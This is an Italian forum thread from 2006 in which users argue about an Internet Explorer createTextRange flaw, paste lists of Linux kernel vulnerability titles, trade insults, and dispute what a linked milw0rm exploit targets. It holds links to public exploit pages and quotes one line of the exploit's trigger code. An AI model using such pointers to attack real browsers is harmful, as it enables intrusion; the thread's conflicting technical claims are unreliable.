          Linux Kernel SCSI ProcFS Denial Of Service
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14790

          Linux Kernel Sysctl Unregistration Local Denial
          of Service Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/15365

          Linux Kernel IPSec Policies Authorization Bypass
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14609

          Linux Kernel ISO File System Denial Of Service
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14614

          Linux Kernel Sendmsg() Local Buffer Overflow
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14785

          Linux Kernel Multiple Vulnerabilities
          2006-03-23
          http://www.securityfocus.com/bid/12598

          Linux Kernel Coda_Pioctl Local Buffer Overflow
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14967

          Linux Kernel USB io_edgeport Driver Local Integer
          Overflow Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/12102

          Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory
          Disclosure Vulnerabilities
          2006-03-23
          http://www.securityfocus.com/bid/17203

          Linux Kernel die_if_kernel Local Denial of
          Service Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/16993

          ecc. ecc.Ommmiiodddio, presto datemi una copia masterizzata di windos che con tutte 'ste vulnerabilita' ci mettono 5 minuti a farmi diventare il peecee in uno zombie...Ok, non si dovrebbe trascurare nessuna vulnerabilita', comunque trascuriamo i DoS, restano un po' di "Local disclosure" e un "buffer overflow", non so' se usabili per elevare localmente i privilegi di un utente.Non so' se ne sei a conoscenza, ma su windos puoi sfruttare localmente le comunicazioni interprocesso tra le finestre (window) per elevare i privilegi, vulnerabilita' impossibile da risolvere (almeno cosi' e' stato dichiarato sotto giuramento da un dirigente microsoft, Allchin se non ricordo male)...I sorgenti sono la' fuori, se ne hai le competenze puoi controllare la bonta' del codice, e se sei in grado puoi renderlo piu' robusto, con windos non lo puoi fare, devi soltanto aspettare che ti venga fornita una patch, dopo che e' stato fatto il giro dei clienti corporate...Ah, sui progetti a sorgente pubblico/aperto c'e' molta trasparenza, tutte gli errori/falle sono resi pubblici, nei prodotti chiusi sai solo quello che a loro fa' comodo...
        • Anonimo scrive:
          Re: Disattiva...
          - Scritto da: Anonimo

          - Scritto da: Anonimo

          Disattivare Windows e passare ad un sistema

          operativo più serio.

          quante vulnerabilità ci sono state per linux
          questo mese?

          Linux Kernel SDLA IOCTL Unauthorized Local
          Firmware Access Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16304

          Linux Kernel DM-Crypt Local Information
          Disclosure Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16301

          Linux Kernel Sysctl_String Local Buffer Overflow
          Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16141

          Linux Kernel ProcFS Kernel Memory Disclosure
          Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16284

          Linux Kernel IP6_Input_Finish Remote Denial Of
          Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16043

          Linux Kernel Time_Out_Leases PrintK Local Denial
          of Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15627

          Linux Kernel ICMP_Push_Reply Remote Denial Of
          Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16044

          Linux Kernel handle_stop_signal Denial of Service
          Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16856

          Linux Kernel IPv6 FlowLable Denial Of Service
          Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15729

          Linux Kernel PTraced Child Auto-Reap Local Denial
          of Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15625

          Linux Kernel PTrace CLONE_THREAD Local Denial of
          Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15642

          Linux Kernel SET_MEMPOLICY Local Denial of
          Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16135

          Linux Kernel mq_open System Call Unspecified
          Denial of Service Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/16283

          Linux Kernel Console Keymap Local Command
          Injection Vulnerability
          2006-03-24
          http://www.securityfocus.com/bid/15122

          Linux Kernel Multiple Memory Leak Local Denial Of
          Service Vulnerabilities
          2006-03-23
          http://www.securityfocus.com/bid/15076

          Linux Orinoco Driver Remote Information
          Disclosure Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/15085

          Linux Kernel USB Subsystem Local Denial Of
          Service Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14955

          Linux Kernel Multiple Security Vulnerabilities
          2006-03-23
          http://www.securityfocus.com/bid/15049

          Linux Kernel 64-Bit SMP Routing_ioctl() Local
          Denial of Service Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14902

          Linux Kernel IPV6 Local Denial of Service
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/15156

          Linux Kernel SCSI ProcFS Denial Of Service
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14790

          Linux Kernel Sysctl Unregistration Local Denial
          of Service Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/15365

          Linux Kernel IPSec Policies Authorization Bypass
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14609

          Linux Kernel ISO File System Denial Of Service
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14614

          Linux Kernel Sendmsg() Local Buffer Overflow
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14785

          Linux Kernel Multiple Vulnerabilities
          2006-03-23
          http://www.securityfocus.com/bid/12598

          Linux Kernel Coda_Pioctl Local Buffer Overflow
          Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/14967

          Linux Kernel USB io_edgeport Driver Local Integer
          Overflow Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/12102

          Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory
          Disclosure Vulnerabilities
          2006-03-23
          http://www.securityfocus.com/bid/17203

          Linux Kernel die_if_kernel Local Denial of
          Service Vulnerability
          2006-03-23
          http://www.securityfocus.com/bid/16993

          ecc. ecc.dopo aver letto l'elenco delle vulnerabilita' del kernel (peccato, se ci fosse stato un disegnino le avresti anche capite) e aver terminato le pippe che non sei riuscito a tenere a freno, corri a tapparti il retrotreno prima che ti zombifichino anche quello.Per il futuro consiglio studi approfonditi di informatica (informatica, non clikkete e p2p) e lunghe passegiate all'aria aperta necessarie per ossigenare a dovere la massa cerebrale.
    • Anonimo scrive:
      Re: Disattiva...
      come si fa ad disattivare activeX e javascript?
      • Anonimo scrive:
        Re: Disattiva...
        - Scritto da: Anonimo
        come si fa ad disattivare activeX e javascript?www.opera.compoi una volta installato e lanciato pigia F12, il resto dovrebbe essere intuitivo anche per un utonto.
      • Anonimo scrive:
        Re: Disattiva...
        - Scritto da: Anonimo
        come si fa ad disattivare activeX e javascript?vai nelle opzioni avanzate
        • Anonimo scrive:
          Re: Disattiva...

          vai nelle opzioni avanzateopzioni avanzate !!!!!!!!!!!!!11ahahahahahaha!!!!!!!!!!!!!!!11ma l'interfaccia about:config dei mozilla likel'hai mai vista ?oppure solo i due miliardi di utenti con gli occhia mandorla hanno un qi sufficente per usarla ?
  • IppatsuMan scrive:
    "Potrebbe consentire"
    "Potrebbe consentire l'accesso"? Purtroppo il condizionale è un'indicativohttp://www.milw0rm.com/exploits/1606E purtroppo sento già anche l'arrivo dei troll (e parlo da Firefoxiano convinto).Detto per inciso ComputerTerrorism UK afferma di avere un PoC funzionante anche su IE beta 2 (anche se la cosa è da dimostrare... forse il fatto che l'exploit sia già pubblico li porterà a pubblicare anche il loro):Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2Severity: CriticalImpact: Remote System AccessSolution Status: UnpatchedCVE Reference: Awaiting ConfirmationAdvisory Date: 22nd March, 2006==================================Modificato dall'autore il 24/03/2006 0.21.56
    • Anonimo scrive:
      Re: "Potrebbe consentire"
      - Scritto da: IppatsuMan
      "Potrebbe consentire l'accesso"? Purtroppo il
      condizionale è un'indicativo

      http://www.milw0rm.com/exploits/1606Non è la stessa falla.
    • Anonimo scrive:
      Re: "Potrebbe consentire"
      - Scritto da: IppatsuMan
      "Potrebbe consentire l'accesso"? Purtroppo il
      condizionale è un'indicativo

      http://www.milw0rm.com/exploits/1606Quella che indichi tu è un'altra falla non è la stessa e per entrambe le falle, IE7 preview di Marzo non è vulnerabile.Quella che PI riporta oggi è questa: http://www.securityfocus.com/bid/17196/discuss http://secunia.com/advisories/18680 /Microsoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview. Quella su milw0rm.com è questahttp://secunia.com/advisories/19269 / e si tratta di un DoS e anche in questo caso IE7 preview di Marzo non crasha.E PI l'ha riportata la scorsa settimana http://punto-informatico.it/p.asp?i=58489
      • IppatsuMan scrive:
        Re: "Potrebbe consentire"
        - Scritto da: Anonimo

        - Scritto da: IppatsuMan

        http://www.milw0rm.com/exploits/1606

        Quella che indichi tu è un'altra falla non è la
        stessa e per entrambe le falle, IE7 preview di
        Marzo non è vulnerabile.
        Quella su milw0rm.com è questa
        http://secunia.com/advisories/19269 / e si tratta
        di un DoS e anche in questo caso IE7 preview di
        Marzo non crasha.(Sperando di non dire caxxate...)No, l'exploit di milw0rm si riferisce al createTextRange() di una checkbox che porta a un remote execution e non a un semplice DoS (ed è proprio http://secunia.com/advisories/18680 ), ed è quello di cui parla PI.Per intenderci: l'exploit di milw0rm sfrutta il SA18680 (che porta a un remote execution) e non il SA19269 (che è un semplice DoS).Microsoft dice che IE 7 beta 2 non è vulnerabile, il creatore dell'exploit dice che lo è.Se qualcuno ne sa qualcosa faccia sapere.(Per la cronaca sul mio pc l'exploit non ha funzionato, suppongo dipenda dal fatto che il PoC è stato fatto su misura per Win XP SP2 in russo, bisognerebbe smanettarci un minimo per controllare)
        • Anonimo scrive:
          Re: "Potrebbe consentire"
          - Scritto da: IppatsuMan
          (Sperando di non dire caxxate...)L'hai detta. Quella falla su milworm da te citata NON centra assolutamente niente con "createTextRange()".
          • Anonimo scrive:
            Re: "Potrebbe consentire"
            - Scritto da: Anonimo
            L'hai detta. Quella falla su milworm da te citata
            NON centra assolutamente niente con
            "createTextRange()".anzi mi correggo, quello sul milworm è il crateTextRange, mentre quello su computer terrorism è invece la falla del DoS di ieri.
          • alex.tg scrive:
            Re: "Potrebbe consentire"
            - Scritto da: Anonimo

            - Scritto da: IppatsuMan

            (Sperando di non dire caxxate...)

            L'hai detta. Quella falla su milworm da te citata
            NON centra assolutamente niente con
            "createTextRange()".Ma l'ultima riga dello script riportato da miw0rm chiama proprio createTextRange().var r = document.getElementById('blah').createTextRange();
          • Anonimo scrive:
            Re: "Potrebbe consentire"
            - Scritto da: alex.tg
            Ma l'ultima riga dello script riportato da miw0rm
            chiama proprio createTextRange().

            var r =
            document.getElementById('blah').createTextRange();si avete ragione, io contestavo questa frase:"Detto per inciso ComputerTerrorism UK afferma diavere un PoC funzionante anche su IE beta 2".Perchè quella su computer si riferisce ad un'altra falla, non è la stessa.
          • alex.tg scrive:
            Re: "Potrebbe consentire"
            Si`, penso di aver capito (ora).C'e` un po' di confusione...
          • Anonimo scrive:
            Re: "Potrebbe consentire"
            - Scritto da: alex.tg
            Si`, penso di aver capito (ora).
            C'e` un po' di confusione...anzi vedo ora che sono entrambe riportate su computer terrorism, anche se una delle 2 è stata scoperta da secunia.
          • Anonimo scrive:
            Re: "Potrebbe consentire"
            - Scritto da: Anonimo
            anzi vedo ora che sono entrambe riportate su
            computer terrorism, anche se una delle 2 è stata
            scoperta da secunia.riassumendo, le falle sono 2:* quella del DoS che faceva crashare IE a causa nel numero elevato di eventi http://lcamtuf.coredump.cx/iedie.html che interessava sempre la MSHTML.DLL* questa ultima che interessa sempre laMSHTML.DLL ma riguarda il createtextrange
    • Anonimo scrive:
      Re: "Potrebbe consentire"
      Quella che indichi tu è un'altra falla non è la stessa e per entrambe le falle, IE7 preview di Marzo non è vulnerabile.Quella che PI riporta oggi è questa: http://www.securityfocus.com/bid/17196/discuss http://secunia.com/advisories/18680 /Microsoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview. Quella su milw0rm.com è quella che PI ha riportato ieri:http://punto-informatico.it/p.asp?i=58489 http://secunia.com/advisories/19269 / e si tratta di un DoS e anche in questo caso IE7 preview di Marzo non crasha.MA SONO 2 FALLE DIVERSE!
    • Anonimo scrive:
      Re: "Potrebbe consentire"
      - Scritto da: IppatsuMan
      Detto per inciso ComputerTerrorism UK afferma di
      avere un PoC funzionante anche su IE beta 2si ma computer terrorism si riferisce ad un'altra falla, non è la stessa.
      • IppatsuMan scrive:
        Re: "Potrebbe consentire"
        - Scritto da: Anonimo

        - Scritto da: IppatsuMan

        Detto per inciso ComputerTerrorism UK afferma di

        avere un PoC funzionante anche su IE beta 2

        si ma computer terrorism si riferisce ad un'altra
        falla, non è la stessa.No, si riferisce proprio a createTextRange:http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044300.html (leggere "technical narrative")
        • Anonimo scrive:
          Re: "Potrebbe consentire"
          - Scritto da: IppatsuMan
          No, si riferisce proprio a createTextRange:si ma il createtextrange è la falla di oggi, mentre quella dell'altro ieri sul DoS riguarda la incapacità di gestire un elevato numero di eventi tipo OnClick in una pagine.In pratica sono 2 le falle e sono diverse:- quella del DoS da eventi tipo OnClick- quella del createTextRange che è un'altra
          • IppatsuMan scrive:
            Re: "Potrebbe consentire"
            - Scritto da: Anonimo

            - Scritto da: IppatsuMan

            No, si riferisce proprio a createTextRange:

            si ma il createtextrange è la falla di oggi,
            mentre quella dell'altro ieri sul DoS riguarda la
            incapacità di gestire un elevato numero di eventi
            tipo OnClick in una pagine.
            In pratica sono 2 le falle e sono diverse:
            - quella del DoS da eventi tipo OnClick
            - quella del createTextRange che è un'altraMa io del DoS non avevo neanche parlato, l'hai tirato fuori tu :P
  • Anonimo scrive:
    non credo cambi molto
    Chi non se ne intende, e' vulnerabile tanto a questa quanto alle altre migliaia di falle in quanto con tutta probabilita' non se ne intende.Chi se ne intende un minimo, fa gli aggiornamenti.Chi se ne intende un po' di piu', e' gia' migrato ad altri browser da tempo (con buona pace dei troll)La domanda vera da porsi su questa domanda e' : e IE7? La notizia dice solo fino a ie6sp1, ma io non sono molto convinto, sebbene molte parti di ie7 siano scritte exnovo, tantissime sono copiaincollate da ie6i troll si aprano un topic a parte grazie, qui si vorrebbe discutere di ie6/7/altribrowser
    • Giambo scrive:
      Re: non credo cambi molto
      - Scritto da: Anonimo
      Chi se ne intende un minimo, fa gli aggiornamenti.Eh, ci fossero gli aggiornamenti ... Mica parliamo di prodotti Open Source, per i quali gli aggiornamenti sono disponibili subito, qui si tratta di Microsoft !
      La domanda vera da porsi su questa domanda e' : e
      IE7?Pare sia vulnerabile pure lui: http://www.milw0rm.com/exploits/1606 Strano, mi aspettavo qualcosa di piu' da questo IE7 ...
      • Anonimo scrive:
        Re: non credo cambi molto
        - Scritto da: Giambo

        - Scritto da: Anonimo


        Chi se ne intende un minimo, fa gli
        aggiornamenti.

        Eh, ci fossero gli aggiornamenti ... Mica
        parliamo di prodotti Open Source, per i quali gli
        aggiornamenti sono disponibili subito, qui si
        tratta di Microsoft !


        La domanda vera da porsi su questa domanda e' :
        e

        IE7?

        Pare sia vulnerabile pure lui:
        http://www.milw0rm.com/exploits/1606
        Strano, mi aspettavo qualcosa di piu' da questo
        IE7 ...beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta beta
        • Giambo scrive:
          Re: non credo cambi molto
          - Scritto da: Anonimo

          Strano, mi aspettavo qualcosa di piu' da questo

          IE7 ...

          betaSara' anche una beta, pero' mi aspettavo che riscrivessero o almeno ricontrollassero parti di codice.Invece pare basarsi ancora pesantemente su IE6 ...
          • Anonimo scrive:
            Re: non credo cambi molto
            - Scritto da: Giambo
            Sara' anche una beta, pero' mi aspettavo che
            riscrivessero o almeno ricontrollassero parti di
            codice.
            Invece pare basarsi ancora pesantemente su IE6 ...Mi chiedo perchè parli quando non le sai le cose.
          • Giambo scrive:
            Re: non credo cambi molto
            - Scritto da: Anonimo

            Invece pare basarsi ancora pesantemente su IE6
            ...

            Mi chiedo perchè parli quando non le sai le cose.Se lo stesso BUG e' presente sia nella versione 6 che nella 7, tu cosa penseresti ?
          • Anonimo scrive:
            Re: non credo cambi molto
            - Scritto da: Giambo
            Se lo stesso BUG e' presente sia nella versione 6
            che nella 7, tu cosa penseresti ?la 7 di marzo è immune
          • Anonimo scrive:
            Re: non credo cambi molto
            - Scritto da: Anonimo

            - Scritto da: Giambo

            Se lo stesso BUG e' presente sia nella versione
            6

            che nella 7, tu cosa penseresti ?

            la 7 di marzo è immunema ne ha molti altri heheheheeh ...
      • mda scrive:
        Re: non credo cambi molto
        - Scritto da: Giambo

        La domanda vera da porsi su questa domanda e' :
        e

        IE7?

        Pare sia vulnerabile pure lui:
        http://www.milw0rm.com/exploits/1606
        Strano, mi aspettavo qualcosa di piu' da questo
        IE7 ...Strano ? IE7 è la modifica di IE6 , anzi avrebbe più bug di IE6 dato che è una beta, inoltre permette più cose ! :| :s :'( .
      • Anonimo scrive:
        Re: non credo cambi molto
        - Scritto da: Giambo
        Pare sia vulnerabile pure lui:
        http://www.milw0rm.com/exploits/1606
        Strano, mi aspettavo qualcosa di piu' da questo
        IE7 ...Quella che indichi tu è un'altra falla non è la stessa e per entrambe le falle, IE7 preview di Marzo non è vulnerabile.Quella che PI riporta oggi è questa: http://www.securityfocus.com/bid/17196/discusshttp://secunia.com/advisories/18680/Microsoft has reported that this issue does not affect the March 20, 2006 release of Internet Explorer 7 Beta 2 Preview. Quella su milw0rm.com è questahttp://secunia.com/advisories/19269/ e si tratta di un DoS e anche in questo caso IE7 preview di Marzo non crasha.
    • Anonimo scrive:
      Re: non credo cambi molto
      - Scritto da: Anonimo
      Chi non se ne intende, e' vulnerabile tanto a
      questa quanto alle altre migliaia di falle in
      quanto con tutta probabilita' non se ne intende.

      Chi se ne intende un minimo, fa gli aggiornamenti.peccato che non ci siano ancora...
      Chi se ne intende un po' di piu', e' gia' migrato
      ad altri browser da tempo (con buona pace dei
      troll)quindi? cosa vuoi insegnare? che se uno non se ne intende è giusto che si preda un virus? oppure che se uno sceglie un altro browser, nel caso di bug (perché i bug capitano a tutti...) non c'è bisogno di aggiornare?
      La domanda vera da porsi su questa domanda e' : e
      IE7? La notizia dice solo fino a ie6sp1, ma io
      non sono molto convinto, sebbene molte parti di
      ie7 siano scritte exnovo, tantissime sono
      copiaincollate da ie6non vedo il problema... quando uscirà la patch, se è come dici tu, la copincolleranno anche su IE7...
      i troll si aprano un topic a parte grazie, qui si
      vorrebbe discutere di ie6/7/altribrowsermah... non è che il tuo discorso fili più di tanto
  • Anonimo scrive:
    HAHHAHAHHAHAHAHAAH
    come da oggetto.
Chiudi i commenti